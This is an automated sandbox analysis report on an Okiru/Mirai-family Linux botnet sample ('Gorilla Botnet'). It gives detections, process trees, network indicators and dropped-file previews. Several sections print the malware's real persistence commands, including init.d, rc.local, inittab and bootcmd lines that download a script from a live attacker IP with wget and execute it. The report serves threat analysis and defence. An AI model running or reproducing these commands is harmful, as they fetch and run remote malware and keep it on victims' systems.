Linux Analysis Report
mipsel.nn.elf

Overview

General Information

Sample name: mipsel.nn.elf
Analysis ID: 1580231
MD5: f0e49a9ec4b07dfc54acfd8cb9b7136b
SHA1: ec3d9752073bdbc98c76f2aa82ef1ee6f5939e2e
SHA256: b44c02a221356cdce2cb1cb02d5100ff7aa23ef9d0c2f92f2fdfe9cdae74fba6
Tags: elf, user-abuse_ch
Infos:

Detection

Okiru
Score: 80
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580231
Start date and time: 2024-12-24 05:17:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: mipsel.nn.elf
Detection: MAL
Classification: mal80.spre.troj.evad.linELF@0/10@0/0
Command: /tmp/mipsel.nn.elf
PID: 6231
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
The Gorilla Botnet Cats Came After You!
Standard Error:
  • system is lnxubuntu20
  • mipsel.nn.elf (PID: 6231, Parent: 6153, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.nn.elf
    • sh (PID: 6251, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6259, Parent: 6251)
      • systemctl (PID: 6259, Parent: 6251, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6284, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6286, Parent: 6284)
      • chmod (PID: 6286, Parent: 6284, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6287, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6292, Parent: 6287)
      • ln (PID: 6292, Parent: 6287, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6293, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
    • sh (PID: 6298, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6300, Parent: 6298)
      • chmod (PID: 6300, Parent: 6298, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mipsel.nn.elf
    • sh (PID: 6301, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6303, Parent: 6301)
      • mkdir (PID: 6303, Parent: 6301, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6304, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6309, Parent: 6304)
      • ln (PID: 6309, Parent: 6304, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
  • udisksd New Fork (PID: 6242, Parent: 799)
  • dumpe2fs (PID: 6242, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6270, Parent: 6269)
  • snapd-env-generator (PID: 6270, Parent: 6269, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6324, Parent: 799)
  • dumpe2fs (PID: 6324, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6355, Parent: 799)
  • dumpe2fs (PID: 6355, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • dash New Fork (PID: 6402, Parent: 4331)
  • rm (PID: 6402, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
  • dash New Fork (PID: 6403, Parent: 4331)
  • rm (PID: 6403, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
  • cleanup
Source | Rule | Description | Author | Strings
mipsel.nn.elf | JoeSecurity_Okiru | Yara detected Okiru | Joe Security |

Source | Rule | Description | Author | Strings
6231.1.00007f4bec400000.00007f4bec41c000.r-x.sdmp | JoeSecurity_Okiru | Yara detected Okiru | Joe Security |
Process Memory Space: mipsel.nn.elf PID: 6231 | JoeSecurity_Okiru | Yara detected Okiru | Joe Security |

No Suricata rule has matched

        AV Detection

        Source: mipsel.nn.elf | Avira: detected
        Source: mipsel.nn.elf | ReversingLabs: Detection: 39%
        Source: mipsel.nn.elfString: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s
        Source: global traffic | TCP traffic: 192.168.2.23:60008 -> 94.156.227.234:38242
        Source: /tmp/mipsel.nn.elf (PID: 6231) | Socket: 0.0.0.0:38242
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknown | TCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr | String found in binary or memory: http://94.156.227.233/
        Source: mipsel.nn.elf | String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 33606
        Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 33606 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sample | String containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/
        Source: ELF static info symbol of initial sample | .symtab present: no
        Source: /tmp/mipsel.nn.elf (PID: 6312) | SIGKILL sent: pid: 6402, result: successful
        Source: classification engine | Classification label: mal80.spre.troj.evad.linELF@0/10@0/0

        Persistence and Installation Behavior

        Source: /tmp/mipsel.nn.elf (PID: 6231) | File: /etc/profile
        Source: /tmp/mipsel.nn.elf (PID: 6231) | File: /etc/rc.local
        Source: /usr/bin/ln (PID: 6292) | File: /etc/rcS.d/S99system -> /etc/init.d/system
        Source: /usr/bin/ln (PID: 6309) | File: /etc/rc.d/S99mipsel.nn.elf -> /etc/init.d/mipsel.nn.elf
        Source: /tmp/mipsel.nn.elf (PID: 6231) | File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)
        Source: /usr/bin/chmod (PID: 6286) | File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)
        Source: /usr/bin/chmod (PID: 6300) | File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)
        Source: /tmp/mipsel.nn.elf (PID: 6312) | File opened: /proc/6395/status
        Source: /tmp/mipsel.nn.elf (PID: 6251) | Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"
        Source: /tmp/mipsel.nn.elf (PID: 6284) | Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
        Source: /tmp/mipsel.nn.elf (PID: 6287) | Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
        Source: /tmp/mipsel.nn.elf (PID: 6293) | Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
        Source: /tmp/mipsel.nn.elf (PID: 6298) | Shell command executed: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
        Source: /tmp/mipsel.nn.elf (PID: 6301) | Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
        Source: /tmp/mipsel.nn.elf (PID: 6304) | Shell command executed: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
        Source: /bin/sh (PID: 6286) | Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system
        Source: /bin/sh (PID: 6300) | Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mipsel.nn.elf
        Source: /bin/sh (PID: 6303) | Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d
        Source: /usr/bin/dash (PID: 6402) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
        Source: /usr/bin/dash (PID: 6403) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
        Source: /bin/sh (PID: 6259) | Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service
        Source: /tmp/mipsel.nn.elf (PID: 6231) | Writes shell script file to disk with an unusual file extension: /etc/init.d/system
        Source: /tmp/mipsel.nn.elf (PID: 6231) | Writes shell script file to disk with an unusual file extension: /etc/rc.local
        Source: /bin/sh (PID: 6293) | Writes shell script file to disk with an unusual file extension: /etc/init.d/mipsel.nn.elf

        Hooking and other Techniques for Hiding and Protection

        Source: /tmp/mipsel.nn.elf (PID: 6231) | File: /etc/init.d/system
        Source: /bin/sh (PID: 6293) | File: /etc/init.d/mipsel.nn.elf
        Source: /tmp/mipsel.nn.elf (PID: 6231) | Queries kernel information via 'uname':
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/mipsel
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmp | Binary or memory string: /qemu-open.XXXXX
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmp | Binary or memory string: /usr/bin/vmtoolsd
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmtP
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mipsel.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.nn.elf
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmp | Binary or memory string: /tmp/qemu-open.EBsJ7m
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmp | Binary or memory string: U!/etc/qemu-binfmt/mipsel
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmp | Binary or memory string: U/tmp/qemu-open.EBsJ7m\
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmp | Binary or memory string: U0!/usr/bin/vmtoolsd
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmtP /proc/2761/exeddressbooQ
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-mipsel

        Stealing of Sensitive Information

        Source: Yara match | File source: mipsel.nn.elf, type: SAMPLE
        Source: Yara match | File source: 6231.1.00007f4bec400000.00007f4bec41c000.r-x.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: mipsel.nn.elf PID: 6231, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: mipsel.nn.elf, type: SAMPLE
        Source: Yara match | File source: 6231.1.00007f4bec400000.00007f4bec41c000.r-x.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: mipsel.nn.elf PID: 6231, type: MEMORYSTR

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 2 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 Data Manipulation
        Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 2 File and Directory Permissions Modification | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | 2 Scripting | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact

        No configs have been found
        [Behavior graph, ID: 1580231, Sample: mipsel.nn.elf, Start date: 24/12/2024, Architecture: LINUX, Score: 80]

        Source | Detection | Scanner | Label | Link
        mipsel.nn.elf | 39% | ReversingLabs | Linux.Backdoor.Mirai |
        mipsel.nn.elf | 100% | Avira | EXP/ELF.Mirai.W |

        Source | Detection | Scanner | Label | Link
        /etc/rc.local | 0% | ReversingLabs | |
        /etc/rc.local | 0% | Virustotal | | Browse

        No Antivirus matches
        No Antivirus matches
        No contacted domains info

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | mipsel.nn.elf | false | | high
        http://94.156.227.233/ | mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr | false | | high

        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        54.171.230.55 | unknown | United States | | 16509 | AMAZON-02US | false
        109.202.202.202 | unknown | Switzerland | | 13030 | INIT7CH | false
        94.156.227.234 | unknown | Bulgaria | | 57463 | NETIXBG | false
        91.189.91.43 | unknown | United Kingdom | | 41231 | CANONICAL-ASGB | false
        91.189.91.42 | unknown | United Kingdom | | 41231 | CANONICAL-ASGB | false

        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        54.171.230.55 | zerarm6.elf | malicious | Unknown |
        54.171.230.55 | mips.elf | malicious | Unknown |
        54.171.230.55 | hidakibest.arm7.elf | malicious | Gafgyt, Mirai |
        54.171.230.55 | Space.x86.elf | malicious | Mirai |
        54.171.230.55 | nn.elf | malicious | Nanominer, Xmrig |
        54.171.230.55 | arm6.nn.elf | malicious | Mirai, Okiru |
        54.171.230.55 | dlr.arm6.elf | malicious | Unknown |
        54.171.230.55 | arm6.elf | malicious | Mirai |
        54.171.230.55 | http://112.31.189.32:40158 | malicious | Mirai |
        54.171.230.55 | Aqua.mpsl.elf | malicious | Mirai |
        109.202.202.202 | kpLwzBouH4.elf | malicious | Unknown | ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb

        No context

        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        AMAZON-02US | armv5l.elf | malicious | Unknown | 35.163.11.216
        AMAZON-02US | splm68k.elf | malicious | Unknown | 3.138.165.134
        AMAZON-02US | nklarm7.elf | malicious | Unknown | 3.115.112.216
        AMAZON-02US | splarm7.elf | malicious | Unknown | 3.116.167.193
        AMAZON-02US | nklarm5.elf | malicious | Unknown | 18.183.83.81
        AMAZON-02US | jklspc.elf | malicious | Unknown | 3.110.151.242
        AMAZON-02US | nabspc.elf | malicious | Unknown | 54.228.23.120
        AMAZON-02US | splarm.elf | malicious | Unknown | 13.251.226.54
        AMAZON-02US | jklm68k.elf | malicious | Unknown | 54.118.240.226
        AMAZON-02US | nabarm.elf | malicious | Unknown | 63.35.239.146
        INIT7CH | nklarm6.elf | malicious | Unknown | 109.202.202.202
        INIT7CH | nabarm6.elf | malicious | Unknown | 109.202.202.202
        INIT7CH | zerm68k.elf | malicious | Unknown | 109.202.202.202
        INIT7CH | zerarm6.elf | malicious | Unknown | 109.202.202.202
        INIT7CH | armv4eb.elf | malicious | Unknown | 109.202.202.202
        INIT7CH | x86_32.nn.elf | malicious | Okiru | 109.202.202.202
        INIT7CH | tftp.elf | malicious | Unknown | 109.202.202.202
        INIT7CH | arm5.nn-20241224-0050.elf | malicious | Okiru | 109.202.202.202
        INIT7CH | bot.sh4.elf | malicious | Mirai, Gafgyt, Okiru | 109.202.202.202
        INIT7CH | mipsel.nn.elf | malicious | Okiru | 109.202.202.202
        NETIXBG | arm7.nn.elf | malicious | Mirai, Okiru | 94.156.227.234
        NETIXBG | powerpc.nn.elf | malicious | Okiru |
                                • 94.156.227.234
                                x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                arm7.nn-20241224-0051.elfGet hashmaliciousMirai, OkiruBrowse
                                • 94.156.227.234
                                sparc.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                arm5.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                arm.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                • 94.156.227.234
                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 94.156.227.234
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                /etc/init.d/mipsel.nn.elfmipsel.nn.elfGet hashmaliciousOkiruBrowse
                                  mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                    mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):122
                                              Entropy (8bit):4.669693856826029
                                              Encrypted:false
                                              SSDEEP:3:KPJRXaw/iFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRl/mfoYZX48bbaaeXCO
                                              MD5:6E34D3CD24992F0E2B8E1EDC806358F9
                                              SHA1:2A73EFBE06FF1248F69716044272ACE0C8DECDC6
                                              SHA-256:23A64AD5E742E99A42FFAA0C46B10B247657BC5895DE4A1542F67BB1FE661609
                                              SHA-512:3D559F41A5E8CED20C1038C0B59DCDBC42646D6FB5E262F19F0E4F13EF3FAFAB4A493125F3369227F019C14E34ACB16EEF62C539714DF0EDB8C05C175670A3C6
                                              Malicious:false
                                              Reputation:low
                                              Preview:run bootcmd_mmc0; /tmp/mipsel.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                              Process:/bin/sh
                                              File Type:POSIX shell script, ASCII text executable
                                              Category:dropped
                                              Size (bytes):410
                                              Entropy (8bit):4.519449750255623
                                              Encrypted:false
                                              SSDEEP:12:QRkio/MXNxuw/0/ePUJgjvMbw/6FxH/MuKN+dRRucSOyd3:b/2/0/ecIx/ul/3YOM3
                                              MD5:1FE3C77D4BFC384D88694556CA239DFD
                                              SHA1:75C0A180A6E2AA298A4C24866DDC3D6A9F6AF098
                                              SHA-256:9E809BE6063B9C07600212B7E878EA5A7B57E2E9BB0B5514F19BBC8C2F8A2372
                                              SHA-512:3E93C56C0DBE10FF5F7736E57F461C67CB600D6CCABA0AAF6B751C93AEEE00B519F6BA1DE23B881C1535A5E80D6A993BAF195E69923A12AC8DC0354F0B0C9420
                                              Malicious:true
                                              Joe Sandbox View:
                                              • Filename: mipsel.nn.elf, Detection: malicious
                                              Reputation:low
                                              Preview:#!/bin/sh.# /etc/init.d/mipsel.nn.elf..case "" in. start). echo 'Starting mipsel.nn.elf'. /tmp/mipsel.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping mipsel.nn.elf'. killall mipsel.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:POSIX shell script, ASCII text executable
                                              Category:dropped
                                              Size (bytes):109
                                              Entropy (8bit):4.626698510896325
                                              Encrypted:false
                                              SSDEEP:3:TKH4vZKaw/iFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8l/mzSXoZX48bzBeLXE0
                                              MD5:539F8D5E9F9630E7755AFC3255B83847
                                              SHA1:91DE1248768F868C0EB04F195696F677A9CDCD45
                                              SHA-256:68BA58E1ACE339B2C096378C5B6E300939F125E02859BEB4AC94C9A900F3E641
                                              SHA-512:EF7A47FA526F8E284110610389D82529C2D0F635235E69FFEAC28CDAE2A01C346B772A3FFBFA6E1C7097286A190143E2244236CAAB84876502F74B0C5B6B8740
                                              Malicious:true
                                              Reputation:low
                                              Preview:#!/bin/sh./tmp/mipsel.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):114
                                              Entropy (8bit):4.594652553807888
                                              Encrypted:false
                                              SSDEEP:3:nAWu5Iw/iFDDoCvLdjX48FIbILbaaFOdFXa5O:AN/mfoYZX48bbaaeXCO
                                              MD5:6519B549572A81833E8C92B99EE17B7F
                                              SHA1:6BBBC13520CDFBF1D7A1B95118124A059116B0ED
                                              SHA-256:33B84F0C2411AA5338C06D292C50BF16A3E7A7E220D49ADEC32E881CD67CF1B3
                                              SHA-512:2634CDAC96A754D2A9EE1C23245A0E67D34ADA15ACC20D9144CEEADB6137CFD9A5CD1A8D3FA53229280B356CECDCA014CFB8B29ECF995112F948C6E763F861DE
                                              Malicious:false
                                              Reputation:low
                                              Preview:::respawn:/tmp/mipsel.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):53
                                              Entropy (8bit):3.871459242626451
                                              Encrypted:false
                                              SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                              MD5:2BD9B4BE30579E633FC0191AA93DF486
                                              SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                              SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                              SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                              Malicious:false
                                              Preview:gorilla botnet is on the device ur not a cat go away.
                                              Process:/tmp/mipsel.nn.elf
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):105
                                              Entropy (8bit):4.491314845702613
                                              Encrypted:false
                                              SSDEEP:3:Tgaw/iFDvSDRFiLdjX48FIbILbaaFOdFXa50:Tgl/mzSXoZX48bbaaeXC0
                                              MD5:AAF2E90396630CCF6A63DEA3968A287B
                                              SHA1:CF20411B5AE5B40FB111B0DB8B5A22ABFD6A28E7
